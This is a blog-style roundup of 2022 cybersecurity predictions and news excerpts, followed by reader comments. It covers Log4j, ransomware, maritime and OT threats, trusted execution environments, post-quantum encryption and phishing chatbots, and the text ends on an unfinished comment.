Nothing is more difficult than making predictions. Instead of trowing out wild ideas what might be coming, I have collected here some trends other people have predicted or reported.
Why the Future Needs Passwordless Authentication
https://securityintelligence.com/future-needs-passwordless-authentication/
As of September, Microsoft users no longer have to rely on passwords when logging in to their accounts. Passwords were suitable for authentication when users had fewer accounts, but things have changed.
Nowadays, everyone’s digital footprint is larger, making passwords more of a burden than a security necessity.
Cyber Warfare: What To Expect in 2022
https://securityintelligence.com/articles/cyber-warfare-what-to-expect-2022/
Cyberwarfare is not a future threatit’s a clear and present danger.
While the concept of cyber terrorism might sound like something from a fictional movie, our interconnected world is riddled with security flaws that make it an unfortunate reality. Read on as we cover seven cyber warfare and cybersecurity threats to watch out for in 2022.
Prediction Season: What’s in Store for Cybersecurity in 2022?
https://www.securityweek.com/prediction-season-whats-store-cybersecurity-2022
The past year has been quite challenging and tiring for many IT and security professionals, as threat actors capitalized on the rapidly changing environment created by accelerated digitalization and cloud transformation in response to the COVID-19 pandemic. And while we all hope that the next year is better when it comes to the onslaught of daily phishing, ransomware, and credential stuffing attacks; cyber criminals will likely learn from this year’s successful tactics, retool, and pivot them into next year’s campaigns to wreak even more havoc in all lives.
Consider the following threats that are on the horizon in 2022 and start preparing for them now:
Compromised Identities Continue to Fuel the Cyberattack Engine
Ransomware Attacks Evolve to Multifaceted Extortion Schemes
Pay Attention to the Supply Chain Threats
The Work from Anywhere Era Creates New Threats
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
We are proceeding in an era of “Malthusian” advances in science and technology, enabled by faster computing and ever-expanding data analytics. Those emerging technologies are significantly impacting cybersecurity. They include artificial intelligence (AI), machine learning, high-performance computing, cloud, edge computing, 5G, and eventually quantum technologies.
Computing systems that employ AI and ML are becoming more pervasive and critical to cyber operations and have become a major focus of cybersecurity research development and investments. Advanced 5G and wireless networks will benefit higher traffic capacities, lower latency, increased reliability, and enable processing and analytics in real-time. Edge computing strives to bring real-time computation, data storage, and operations closer to the device, rather than relying on a central location, avoiding latency issues. Technologies that improve capabilities for discovering, categorizing, monitoring, synthesizing, and automating the analysis of data are advantages in mitigating cybersecurity threats. Specifically, such tech can be used to bolster botnet detection and mitigation technology, data visualization tools, active malware protection, rootkit detection and mitigation technology, and incident response analytics.
Emerging tech can be a two-way street for good and bad. Artificial intelligence and machine learning can be used by hackers to automate target selection and more. Threat actors, especially state-sponsored and criminal enterprises, are becoming more sophisticated by searching for vulnerabilities and infiltrating malware by adapting (and automating), enabling machine learning, deep learning, artificial intelligence, and other analytic tools.
Also, the emergence of the Internet of Things presents special security challenges. There are an estimated 44 billion IoT endpoints today and trillions of sensors connected to those endpoints. Hackers have many attack options and entries for inserting malware into such a large and unregulated attack surface.
Google Finds 35,863 Java Packages Using Defective Log4j
https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4j
The computer security industry is bracing for travel on long, bumpy roads littered with Log4j security problems as experts warn that software dependency patching hiccups will slow global mitigation efforts.
The sheer scale and impact of the crisis became a bit clearer this week with Google’s open-source team reporting that a whopping 35,863 Java packages in Maven Central are still using defective versions of Log4j library.
The vulnerability, flagged as CVE-2021-44228, was first discovered and reported by the Alibaba cloud security team on November 24 this year. Less than two weeks later, exploitation was spotted in the wild, prompting the release of multiple high-priority patches and an industry-wide scramble to apply practical mitigations.
Many actors have exploited the critical Apache Log4j vulnerability named Log4Shell to infect vulnerable devices. Apache has released several Log4j versions to fix the original Log4j vulnerability (CVE-2021-44228) and newer findings on the same software (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105, CVE-2021-42550).
Threat Intelligence on Log4j CVE: Key Findings and Their Implications
https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications
Expect this vulnerability to have a long attack tail. We anticipate that due to how widely used this software is and the large number of exploit variations, we will continue to see exploit attempts for months to come and expect many breaches will get uncovered going forward.
Attackers used opportunistic injections and became more targeted. Consequences of the reconnaissance may not be fully understood for months. While the attacks can be mitigated by patching and other methods, it’s unclear how many breaches have happened already. It will take time for the breaches to come to light and for us to understand their magnitude.
Ransomware in 2022: We’re all screwed
https://www.zdnet.com/article/ransomware-in-2022-were-all-screwed/
Over the past few years, we’ve seen ransomware operators evolve from disorganized splinter groups and individuals to highly sophisticated operations, with separate teams collaborating to target everything from SMBs to software supply chains. Ransomware infection is no longer an end goal of a cyberattack. We are experiencing the “golden era of ransomware,” now in part due to multiple monetization options.
Burnout: The next great security threat at work
https://blog.1password.com/state-of-access-report-burnout-breach/
Many companies feel like they’ve successfully pivoted to remote and hybrid work. Team members have learned the tools and processes required to be successful outside the office, and IT departments have adjusted their security rules and policies accordingly. But now, nearly two years into the pandemic, another cybersecurity threat has
emerged: employee burnout.
In 2022, security will be Linux and open-source developers job number one
https://www.zdnet.com/article/in-2022-security-will-be-linux-and-open-source-developers-job-number-one/
Linux is everywhere. It’s what all the clouds, even Microsoft Azure, run. It’s what makes all 500 of the Top 500 supercomputers work. Heck, even desktop Linux is growing if you can believe Pornhub, which claims Linux users grew by 28%, while Windows users declined by 3%. Its real trouble isn’t so much with open-source itself. There’s nothing magical about open-source methodology and security. Security mistakes can still enter the code. Linus’s law is that given enough eyeballs, all bugs are shallow. But, if not enough developers are looking, security vulnerabilities will still go unnoticed. As what I’m now calling Schneier’s law, “Security is a process, not a product, ” points out constant vigilance is needed to secure all software.
The future of OT security in an IT-OT converged world
https://www.theregister.com/2021/11/09/securing_ics_in_the_cloud/
Securing ICS in the cloud requires ‘fundamentally different’ approach
If you thought the industrial internet of things (IIoT) was the cutting edge of industrial control systems, think again. Companies have been busy allowing external access to sensors and controllers in factories and utilities for a while now, but forward-thinking firms are now exploring a new development; operating their industrial control systems (ICS) entirely from the cloud. That raises a critical question: who’s going to protect it all?
Dave Masson, Director of Enterprise Security at Darktrace, calls this new trend ‘ICSaaS’. “ICS for the cloud is starting to happen now. That represents a whole new world for industrial technology and security.”
This trend has been possible for the last decade or so, he explains, but the uptake has been slow. Now, Masson is hearing from clients who are actioning it.
Operational technology admins may be nervous about allowing cloud-based control of their infrastructures, but they’re attracted by the potential benefits. If operators are accessing ICS remotely anyway, then it makes it easier to consider cloud-based interfaces. These make the management infrastructure cheaper and easier to operate.
In this scenario, the hardware components that make up ICS stay where they are. We’re not talking about virtualizing programmable logic controllers here. It’s the data governing their operation that moves to the cloud. That means the applications, databases, and other services that operators rely on to keep those components running smoothly.
Security is just as important in these new cloud-enabled environments as it was in the old legacy walled gardens, but the challenges facing defenders are different. The cloud is eroding the gap between IT and OT. OT is now part of what looks increasingly like a common IT network.
“Now, anybody can access this network from anywhere, so you’ve got to make sure you have good controls around who’s got permission”
“This raises questions about data security, compliance, and regulation.”
OT admins, used to maintaining an iron grip on their infrastructure, now risk a loss of visibility and control. There are organizational worries to consider beyond the technological ones. Converging IT/OT infrastructures is only part of the story. You must also decide who is managing security for the expanded network. Is it the IT security team, or the OT team, or both?
Zero trust architecture is a common talking point today when discussing cloud-based security, and that will be important. ICSaaS is only one part of a broader shift towards OT/IT convergence. The advent of 5G, along with the development of edge computing, will accelerate the trend still further.
Sophos 2022 Threat Report: Malware, Mobile, Machine learning and more!
https://nakedsecurity.sophos.com/2021/11/09/2022-threat-report/
we’ve covered five main topics: 1 Malware, 2 Mobile, 3 Machine Learning and AI, 4 Ransomware (because we simply couldn’t not give it a section of its own), and 5 Where next?. PDF:
https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2022-threat-report.pdf
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
What are some of the emerging technologies in security? Would these generate opportunities and create challenges?
Critical Infrastructure (CI) and supply chain will be targeted even more in 2022 (state-sponsored, cybercriminal gangs) with ransomware and malware attacks.
• Investment and risk strategies will expand in conducting vulnerability assessments and filling operational gaps with cybersecurity tools. Tools include Data Loss Prevention (DLP), encryption, identity and access management solutions, log management, and SIEM platforms.
• Despite efforts to attract workers to security and tech jobs, the qualified cybersecurity worker shortage will continue to pose major operational challenges. Both the public and private sectors are currently facing challenges from a dearth of cybersecurity talent. A report out from the firm Cybersecurity Ventures estimates there are 3.5 million unfilled cybersecurity jobs in 2021. 2022 is not showing any signs of improvement in hiring.
• The Internet of Things (IoT) will pose a growing cybersecurity risk. IoT’s exponential connectivity is an ever-expanding mesh of networks and devices.
There are some specific areas where AI technology will contribute to making cybersecurity smarter include:
• AI can provide a faster means to detect and identify cyberthreats. Cybersecurity companies will be using software and a platform powered by AI that monitors real-time activities on the network by scanning data and files to recognize unauthorized communication attempts, unauthorized connections, abnormal/malicious credential use, brute force login attempts, unusual data movement, and data exfiltration. This allows businesses to draw statistical inferences and protect against anomalies before they are reported and patched.
• AI will impact Incident Diagnosis and Response capabilities.
While descriptive analytics provided by network surveillance and threat detection tools can answer the question “what happened,” incident diagnosis analytics address the question of “why and how it happened.” To answer those questions, new software applications and platforms powered by AI can examine past data sets to find root causes of the incident by looking back at change and anomaly indicators in the network activities
• AI will also enable better cyberthreat intelligence reports by analysts. Next year analysts will be able to use AI tools to generate automated cyberthreat intelligence reports (CTI). Cyberthreat intelligence reports provide the indicators and early warning necessary to better monitor unusual activities on a given network and detect more rapidly cyber threats.
AI and ML will be an enabler for cybersecurity for the foreseeable future. AI-powered tools and automation enablement will play an increased and integral role in keeping us cyber-safe in 2022 and beyond.
Kännyköiden tietoturva menee uusiksi
https://etn.fi/index.php/13-news/12788-kaennykoeiden-tietoturva-menee-uusiksi
In smartphones, security has been in place for more than a decade, with trusted processing performed in the TEE (Trusted Execution Environment) section of device memory. The current standard solution for smartphone security is typically created with Arm’s TrustZone technology. The phone’s own security comes from TEE. A secure boot usually includes a TEE. TEE has been an elegant solution for smartphones, although it is becoming old-fashioned (Arm TrustZone was developed 15 years ago).
The memory required by the TEE has not been available in the small controller chips used for embedded applications. Manufacturers have promoted Safe Boot and Memory Encryption or Flash Encryption, but they have been pretty weak solutions. Recently, Arm’s TrustZone M has introduced a new security model for controllers.
In recent years, this picture has begun to diversify. A revolution is underway now. Google has launched a keystone technology that allows an application to generate a system-maintained key and authenticate services (still uses TEE).
In the future, for example, encryption keys will be stored in an isolated memory area, an enclave, says Jan-Erik Ekberg, head of Huawei’s HSSL laboratory (Helsinki System Security Lab). Five years ago, Intel introduced SGX technology for PC servers, which simply means security extension commands added to the CPU chip. In this solution, TEE type protections are provided by a secure enclave. The use of this type of security enclave needs less code than traditional TEE structure. An enclave is a temporary structure in the memory of a device. It is created only for security processes and exits when it has completed its task. The difference is significant in the TEE structure, where another kernel runs all the time alongside the operating system. When there is no other parallel kernel, there is one component less to attack.
In Intel’s SGX, enclaves were implemented through caching, which limited their use. Intel has sought to overcome this limitation with newer TDX (Trust Domain Extensions) technology. AMD aims to do the same with its own SEV (Secure Encrypted Virtualization) technology.
Enclave-style solution structure will also come in the smart phones. The new Armv9-A architecture last year offers a realm mode that is very close to the technologies offered on the server side (Intel SGX). With the coming enclaves, an infinite number of secured environments will be available in principle.
In the mobile ecosystem, TEE is so deeply rooted that the transition will probably take five years. During the transition period TEE and more dynamic solutions will be on the market in parallel.
Kyberhyökkäykset uhkaavat jo tavarantoimituksiakin
https://www.uusiteknologia.fi/2021/11/08/kyberhyokkaykset-uhkaavat-jo-tavarantoimituksiakin/
Cyber attacks will cause chaos in product supply chains in the future, estimates Japanese security firm Trend Micro in its latest report. They can also cause physical harm to people, so it’s not just about problems with production or distribution.
According to Trend Micro, network connectivity by 2030 will affect our everyday lives even more, both physically and mentally. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Artificial intelligence tools democratize cybercrime from technically savvy individuals and criminal organizations to all. The new “Everything as a Service” service model also makes cloud service providers very attractive targets for cyber attackers.
Massive IoT (MIoT) environments in industrial facilities, logistics centers, transportation systems, healthcare, education, commerce, and homes are attractive targets for saboteurs and blackmailers. The new 5G and subsequent 6G networks are also making attacks more sophisticated and targeted.
In the future, user manipulation and fake news will become increasingly important and difficult to ignore when fed to smart glasses. Reality can be badly distorted.
https://resources.trendmicro.com/rs/945-CXD-062/images/WP01_Project%202030_White%20Paper_210505US_Web.pdf
Jarno Limnéll varoittaa “kyberpandemiasta” internetin häiriö voi panna maailman taas sekaisin
https://www.tivi.fi/uutiset/tv/211df5c9-7909-47b7-842b-719f6a496206
Cyber harassment and sports doping have a lot in common. Tracing and testing methods are evolving, but so are scams. And scammers always seem to be one step ahead. Sometimes they are only revealed years later. “The world is moving in the direction that technology is evolving faster and faster, and rather increasing the possibility of various disruptions and creating new types of vulnerabilities. There is no seamless security,” Limnagl says. So even with technology, the world will not be completed. In addition, crises always come as a surprise: New York on September 11, the Bosnian war, Hitler’s rise to power, the shots in Sarajevo. “In light of history, we’re always surprised. And if you think about it, technology only adds to the complexity and surprise of crises.”
Kyberhyökkäykset kiihtyvät, mutta yritykset voivat vastata niihin
https://etn.fi/index.php/new-products/13-news/12920-kyberhyoekkaeykset-kiihtyvaet-mutta-yritykset-voivat-vastata-niihin
Cyber attacks are accelerating, but companies can respond to them A new study by security firm Trend Micro predicts that the number of cyber attacks will increase, with a particular focus on IoT devices. At the same time in 2022 global organizations will be more vigilant and better prepared to face new cyber threats. Research, foresight, and automation are critical to risk management and employee protection. The shift of workers to telecommuting has opened up new avenues for attackers, so the attack area of companies and organizations has grown exponentially. Fortunately, hybrid work is becoming more established and more predictable, allowing security decision-makers to plan and refine their security strategies. Those are:
• Enhanced server security and application management policies to combat blackmail
• A risk-based update plan and an effort to detect security vulnerabilities in advance
• Improved basic protection for SMEs using cloud services
• Active network monitoring, especially in IoT environments
• Zero Trust security model to secure international supply chains
• Cloud security focused on the risks assessed by the DevOps team and industry best practices
• Advanced Detection and Response (XDR) model to detect attacks on large networks
Trend Micron raportti: tulevaisuudessa kaikki on vaarassa
https://etn.fi/index.php/13-news/12785-trend-micro-raportti-tulevaisuudessa-kaikki-on-vaarassa
Security company Trend Micro has released its 2030 future report. Videos also tell us what the world could look like at the beginning of the next decade. From the perspective of cyber threats and cybersecurity, the future looks bleak. By 2030, connectivity, or continuous online presence, will affect our daily lives on both a physical and mental level. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Trend Micro hopes that this review will spark debate both within the security industry and in society at large. We can only prepare for the cyber challenges of the next decade by comprehensively anticipating all possible situations and advising how governments, the business world and individuals can prepare for them.
Project 2030
https://2030.trendmicro.com/?utm_campaign=ADC2021_Corporate_2030_Predictions&utm_medium=Press-Release&utm_source=Press-Release_Glimpse-into-future_PR&utm_content=Watch-video
Welcome to your new reality, more connected than ever to all the riches modern life has to offer, yet where truth has never been more insubstantial.
3,062 Comments
Tomi Engdahl says:
The Vulnerable Maritime Supply Chain – a Threat to the Global Economy
https://www.securityweek.com/vulnerable-maritime-supply-chain-threat-global-economy
Merchant vessels and ports are extraordinarily vulnerable to increasingly sophisticated cyberattacks against OT systems
Around 90% to 95% of all shipped goods at some stage travel by sea. This makes the global maritime industry the world’s single largest and most important supply chain. Successful cyberattacks against the maritime supply chain would have the potential to damage individual companies, national finances and even the global economy.
Attack vectors
The maritime sector includes the ports and the vessels that use them. The vessels range from small freight carriers to oil supertankers, super cargo carriers transporting in excess of 20,000 20-feet containers, and superyachts carrying high value individuals. While the port authorities are already under threat and attack by ransomware gangs, less attention has been paid to the threat of attacks against the vessels.
The merchant maritime sector functions with vessels that have been operational for anything from a few years to a few decades. The older vessels have had new technology added to improve efficiency through digitization and automation. Updating this technology can be very expensive and will depend on various criteria: opportunity, cost/risk assessments, economic strength of the company, and regulatory requirements. The result is that many ships in the merchant maritime sector are vulnerable to cyberattack.
Superyachts tend to be new and packed with the very latest gadgetry. They tend to be more secure, although successful compromise offers an attacker greater control over the vessel. For example, a successful attack could give remote control over both throttle and rudder.
John Sheehy, SVP of research and strategy at IOActive, points to three primary paths for an attacker to gain access to a vessel. “There’s WIFI; some vessels have High Frequency (HF) radio; and commercial satellite communications (SATCOM) such as Inmarsat,” he told SecurityWeek. To these we should add the USB stick -carrying insider, and earlier compromises to the vessel’s own supply chain.
The satellite communications often combine Inmarsat and GPS, and he considers this to be the primary threat vector – adding, “We know that a Russian APT group has the capability to remotely exploit the same types of SATCOM terminals used in maritime environments on vessels.”
Tom Van De Wiele, principal technology and threat researcher at F-Secure, adds, “Attacks aimed at communication links can be targeted at either the vessel communication links themselves using satellite communication or the port infrastructure on shore used to communicate with the vessels at sea. This is linked to the back-end systems of the shipping IT infrastructure for container and ship monitoring systems.”
Practical and theoretical effects of maritime supply chain damage
There are no known serious examples of vessel compromise, but the potential effect can be seen in genuine maritime mishaps and in theoretical analyses. Genuine mishaps would include the Torrey Canyon in 1967, and the Ever Given in 2021.
“There have been various estimates about the cost of the Suez closure, but some of them are as high as ten or eleven billion dollars a day, and those estimates were done before it was clear how long and how expensive it would be to clear the backlog that the blockage caused. Months later, there were still ships queuing up to get into Port of Los Angeles because the whole scheduling pattern had been broken.”
“If you look at things like oil reserves, fresh food reserves, and other critical things within the UK, we have some reserves but need to receive new shipments daily. The UK has about 11 significant ports, but most container shipments come through just four ports. If those ports were effectively jammed in the ways we’ve shown we can do for other ports, it would mean that the supply of goods coming into the UK would drop dramatically – for the sake of discussion, very close to zero.”
Removing the blocking vessels would take weeks rather than days. “Assuming the attacker could pick the conditions, coordinate the attacks in the way they want to – which is difficult, but not impossible,” he continued, “you’ve basically cut off the supply of goods to the UK: we’re not getting fresh foodstuffs and we’re not getting oil. Very quickly we’ll arrive at the point where power stations no longer have the capacity to run. There are strategic reserves that could be released, but there are consequences and logistic difficulties to doing that. So, you start losing power, you start losing freezer capacity – and frozen stores, both in homes and in bulk storage, go rotten within a week. You cascade all these effects – including loss of fuel for transport– and it is not long before you have a catastrophic failure of systems. It’s not the most likely scenario, but it is a scenario that is well within the bounds of possibility.”
A similar exercise was done in the US by University of Illinois Urbana-Champaign. “They looked at closing just one port in Florida,” said Jones, “and they got to the point in their thought experiment where people on the east coast were shooting each other quite quickly. The general principle is that we are highly dependent on pretty much real-time resupply via shipping. Cut that out for a while, and you’ve got a real problem.”
Attacker motivations, means and threat scenarios
Motivations for attacking the maritime sector are fundamentally no different to those for any other industry sector. They include ethical/political (hacktivists), financial (cybercriminal gangs), and geopolitical (nation states). Hacktivism may appear the least likely, but there is no technical reason to prevent an attack against a vessel by a determined and well-resourced hacktivist group.
The nation-state threat is perhaps the most concerning, which currently includes but goes beyond the Russia/Ukraine war. “For a number of years, it’s been known that in the northwest region around Russia GPS satnav is unreliable,” comments Jones. “It’s unreliable because Russia has been broadcasting spoofed GPS signals. Ships’ captains have reportedly said, ‘I suddenly find myself in the middle of a playing field three miles inland, but when I look out the window, the ocean is still there.’”
In February 2022, the US Office of the Director of National Intelligence issued its annual threat assessment, saying, “Russia is investing in electronic warfare and directed energy weapons to counter western on-orbit assets. These systems work by disrupting or disabling adversary C4ISR [command, control, communications, computers, intelligence, surveillance, and reconnaissance] capabilities and by disrupting GPS, tactical and satellite communications, and radars.”
And on March 17, 2022, CISA issued an alert warning about “possible threats to US and international satellite communication (SATCOM) networks. Successful intrusions into SATCOM networks could create risk in SATCOM network providers’ customer environments.”
“There is evidence that nation states, and Russia in particular, have been experimenting with things like compromising GPS,”
Casey Bisson, head of product and developer relations at BluBracket, comments, “The maritime industry, like all industries, is becoming increasingly dependent on industrial IoT and connected devices. Common IoT risks like weak default credentials, undocumented backdoors, and vulnerabilities that allow unauthorized remote access and control are especially concerning on vessels. Vessels at sea and in port are both vulnerable to disruption and could potentially be used as weapons in larger state conflicts.”
IOActive’s Sheehy has similar concerns. “The War in Ukraine has caused part of the Black Sea and the Sea of Azov to become impassable, which necessarily limits exports and imports to both Russian and Ukrainian Black Sea ports. Of particular concern is Odessa, Ukraine, which is the largest commercial port on the Black Sea. The Russians could choose to use deniable cyber operations as a step up the escalation ladder to impose a cost on those countries who have imposed sanctions on them. Moreover, judicious operations could produce global effects as we saw with the blocking of the Suez Canal by the Ever Given, which was a result of pilot error.”
An extension to the spoofed GPS signals that might confuse a ship’s captain is interference to the ship’s Automatic Identification System (AIS). This could be an approach taken by cybercriminal gangs as part of a piracy scenario. These systems broadcast identification and location information so that both other ships and shore-based authorities know exactly what ship is where. A compromised AIS could transmit either wrong information (making the ship appear to elsewhere) or no information (making it effectively an invisible ghost ship).
Jones described an example of a theoretical attack against a superyacht (although the basic principles could be harnessed against any vessel).
“Being able to get access to the systems on board the yacht,” he explained, “and to know what the plan is (that is, the charted route), and maybe even to monitor comms to know who’s on board; and then to use a hack on the charting system, you could misdirect the yacht so it thinks it is staying nicely clear in international waters, but you bring it within fast boat range of the Somali coast. At the same time, alter the AIS transponder system so that the vessel is reporting itself as being somewhere, let’s say north, of where it is supposed to be while it has gone way south. Fast gunboats can come out and take the crew hostage. The yacht may have broadcast an emergency alert, and an interdiction ship may have been dispatched – but it will go to where the AIS is reporting the location. So, there’s a mismatch between actual and reported location, which reduces the risk for kidnappers.”
The maritime sector is already in the crosshairs of the ransomware gangs. “We have certainly seen ransomware affect maritime shipping,” John Bambenek, principal threat hunter at Netenrich, told SecurityWeek. “The entire ecosystem is supported by IT systems. When they are compromised, ships may have to wait in port for it to be sorted out, or goods cannot be shipped outbound to their customers. The net effects will look much like supply chain disruptions we have seen over the last year.”
Jasmine Henry, field security director at JupiterOne, agrees that the port itself is a vulnerable part of the maritime ecosphere. “The reason is simple,” she said. “The majority have limited visibility into ICS systems to even understand which devices exist, let alone apply proper updates or configurations. Merchant vessels and ports are extraordinarily vulnerable to increasingly sophisticated ransomware attacks against unmanaged OT systems, as well as DDoS attacks, command injection, sideloaded malware, and exploited misconfigurations.”
The cyber reality
“One of the weird things about my job,” said Professor Jones, “is that I get to look at all the truly horrible things you can do by taking control of a ship. But I try not to be too melodramatic, because there are too many over-hyped horror stories in cybersecurity. While I don’t want small freight companies to go out of business because they cannot afford hundreds of thousands of pounds to update their ships, there is certainly the possibility of both criminal extortion and nation state geopolitical activity using vessels. With some vessels, it would be very hard to mitigate against an attack – sometimes, the crew will have less than a minute to respond – so an attacker with sufficient skill and determination has a high probability of success.”
What is missing from the maritime sector is the ability to do genuine and regular risk assessments. The risk is different for each vessel, and varies depending on the route, cargo, and external threat conditions.
The bottom line today, however, is that the global economy’s single biggest supply chain is vulnerable to cyberattack.
Tomi Engdahl says:
National Cybersecurity Agencies Describe Commonly Used Initial Access Techniques
https://www.securityweek.com/national-cybersecurity-agencies-describe-commonly-used-initial-access-techniques
Cybersecurity agencies in the United States, the United Kingdom, Canada, the Netherlands, and New Zealand warn that threat actors exploit poor security practices for initial access to victim environments.
Common techniques employed by adversaries looking to compromise a target system include exploitation of public-facing applications or external remote services, phishing, the use of valid credentials, and exploitation of trusted relationships.
Authorities in the five concerned countries have identified a series of weaknesses that malicious actors typically look to exploit in their attacks, which include improper security controls, weak configurations, and overall poor cybersecurity practices.
Environments susceptible to exploitation, they say, lack mandatory multi-factor authentication, have incorrectly applied privileges or permissions, use default configurations or default credentials, or run on software that is not kept up to date.
Unprotected remote access services, weak password policies, unprotected cloud services, open ports, and misconfigured services can also be targeted in malicious attacks.
Failure to detect phishing attempts and the lack of strong endpoint detection and response are also known causes of intrusion, the five nations say.
To ensure they are protected, organizations are advised to implement a zero-trust security model, to limit the remote login of local administrators, control user access to resources, implement proper conditional access policies, and make sure that no system has open RDP ports.
Tomi Engdahl says:
NVIDIA Patches Code Execution Vulnerabilities in Graphics Driver
https://www.securityweek.com/nvidia-patches-code-execution-vulnerabilities-graphics-driver
NVIDIA has announced the roll-out of updates for its graphics drivers to address multiple vulnerabilities, including four CVEs rated “high severity.”
The most severe of these issues are CVE‑2022‑28181 and CVE‑2022‑28182 (CVSS score of 8.5), which could lead to “code execution, denial of service, escalation of privileges, information disclosure, and data tampering,” NVIDIA says.
Both security holes could be exploited by an “unauthorized attacker on the network” to cause “an out-of-bounds write through a specially crafted shader.”
While CVE‑2022‑28181 impacts both the Windows and Linux versions of NVIDIA’s GPU display drivers, CVE‑2022‑28182 exists in the Windows DirectX11 user mode driver, the company says.
The vulnerabilities were reported by Cisco Talos’ security researchers, who say that CVE‑2022‑28182 in fact describes three memory corruption issues identified in NVIDIA D3D10 Driver version 496.76, 30.0.14.9676.
“An attacker could exploit these vulnerabilities by sending the target a specially crafted executable or shader file. These issues could also allow an adversary to perform a guest-to-host escape if they target a guest machine running virtualization environments,” the researchers note.
Tracked as CVE‑2022‑28183 (CVSS score of 7.7) and CVE‑2022‑28184 (CVSS score of 7.1), the other two high-severity vulnerabilities resolved with NVIDIA’s May 2022 set of patches impact both Windows and Linux drivers.
Tomi Engdahl says:
DOJ Announces It Won’t Prosecute White Hat Security Researchers https://www.vice.com/en/article/v7d9nb/department-of-justice-security-researchers-new-cfaa-policy
On Thursday the Department of Justice announced a policy shift in that it will no longer prosecute good-faith security research that would have violated the country’s federal hacking law the Computer Fraud and Abuse Act (CFAA).
Tomi Engdahl says:
The passwords most used by CEOs are startlingly dumb https://www.pcgamer.com/the-passwords-most-used-by-ceos-are-startlingly-dumb/
A recent cybersecurity report shows how immensely idiotic many CEOs and business owners can be, considering the strength of their chosen account passwords. Imagine entrusting the livelihood of hundreds, even thousands of employees to someone who uses ’123456′ or ‘qwerty’ as a password.
Tomi Engdahl says:
NSA Swears On The Body Of Ed Snowden It Will Not Backdoor New Encryption Standard https://www.techdirt.com/2022/05/16/nsa-swears-on-the-body-of-ed-snowden-it-will-not-backdoor-new-encryption-standard/
The NSA which has undermined encryption standards in the past says it won’t undermine the next strain of encryption, one being built to withstand the inevitable arrival of quantum computing. Myös:
https://www.bloomberg.com/news/articles/2022-05-13/nsa-says-no-backdoor-in-new-encryption-scheme-for-us-tech
Tomi Engdahl says:
Ihminen ei voi suojautua tekoälyä vastaan
https://etn.fi/index.php/13-news/13609-ihminen-ei-voi-suojautua-tekoaelyae-vastaan
Rik Ferguson on tietoturvayhtiö Trend Micron tutkimusjohtaja. Pandemian aikana miehen johdolla laadittiin Project 2030 -raportti, jossa ennustettiin miehen tietoturva ja kyberrikollisuus on menossa. Tekoäly ja koneoppiminen tulevat laajasti myös kyberrikollisten käyttöön, eikä se ole millään muotoa hyvä uutinen.
- Kun meillä on koodia, joka osaa koodata, teknologian kehityksen vahti kiihtyy. Kun tekoäly rakentaa uusia tuotteita, se toimii konenopeudella eikä ole enää rajoittunut ihmisen tapaan ajatella.
Tämä on iso ongelma kyberpuolustajille. – Olemme tottuneet ihmisvastustajaan ja lainsäädäntökin on suunnattu ihmisrikollista vastaan. Kun vastustaja on kone ja ajattelee tekoälyn tavoin, kaikki se, mitä olemme oppineet puolustamisesta, voi menettää merkityksensä, Ferguson näkee.
- Samalla tapaa tekoäly ei ole rajoitettu ihmisen logiikkaan tai ajatuksen edistymiseen. Tämä tulee olemaan valtava haaste. Miten tätä vastaan voidaan puolustautua? Miten sitä voidaan reguloida?
Fergusonin mukaan lopulta päädytään siihen, että tekoäly taistelee tekoälyä vastaan. – Jos puolustautuu jotakin sellaista vastaan, joka ajattelee eri tavoin tai toimii eri ajatustilassa (thought space), niin ainoa tapa vastata on iteroida kaikki mahdolliset ajatukset. Pitää vastata brute forcella. Ihminen ei voi tehdä tätä riittävän nopeasti.
Tomi Engdahl says:
QuSecure Lauches Quantum-Resilient Encryption Platform
https://www.securityweek.com/qusecure-lauches-quantum-resilient-encryption-platform
New firm launches to provide the Easy Button for implementing quantum secure encryption
The pressure to implement quantum secure encryption is increasing. This isn’t because functioning quantum computers able to crack asymmetric encryption are expected tomorrow, but because of the growing belief they could become available in five- or ten-years’ time.
Communications are being stolen by adversaries today, containing secrets with a shelf-life of decades, under the ‘harvest now, decrypt later’ principle. These communications need to be protected against future quantum decryption now.
On April 18, 2022, Khanna, Connolly and Mace introduced the bipartisan Quantum Computing Cybersecurity Preparedness Act. The introduction states, “To protect our country’s data, critical government systems must be secured with algorithms and encryption so difficult to crack that even a future quantum computer won’t be able to break the code. This can be done through post-quantum cryptography.”
On May 4, 2022, the White House issued a memorandum with the dual purpose of promoting quantum research and development, and implementing quantum-proof encryption. Talking about ‘a cryptanalytically relevant quantum computer (CRQC)’, it warns, “When it becomes available, a CRQC could jeopardize civilian and military communications, undermine supervisory and control systems for critical infrastructure, and defeat security protocols for most Internet-based financial transactions.”
Tomi Engdahl says:
Phishers Add Chatbot to the Phishing Lure
https://www.securityweek.com/phishers-add-chatbot-phishing-lure
Researchers have discovered a new approach being taken by phishers to increase victim engagement and confidence: the addition of an interactive chatbot. We have all become accustomed to the chatbots used by many of the largest service providers – they are annoying, but something we must navigate.
The phishers hope that this reluctant acceptance of chatbots will help lower the attention of the target victim. The process is described in a new blog post.
Interactive Phishing: Using Chatbot-like Web Applications to Harvest Information
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/interactive-phishing-using-chatbot-like-web-applications-to-harvest-information/
Phishing website links are commonly delivered via email to their respective targets. Once clicked, these websites often show a single webpage that outright asks for sensitive information like account login credentials, credit card details, and other personally identifiable information (PII).
Recently, we have encountered an interesting phishing website containing an interactive component in it: a chatbot. Unlike a lot of phishing websites, this one establishes a conversation first, and bit-by-bit guides the victim to the actual phishing pages.
Although the phishing method is quite unique, it still uses email as the delivery channel. A deeper inspection of the email header shows that the “From” header is missing the email address component, which is a red flag already.
To gain even more confidence and trust from the target, a CAPTCHA is presented right after the victim clicks the “Schedule delivery” button. However, something is odd here – nothing else is clickable except for the confirm and close button.
Tomi Engdahl says:
Joseph Cox / VICE:
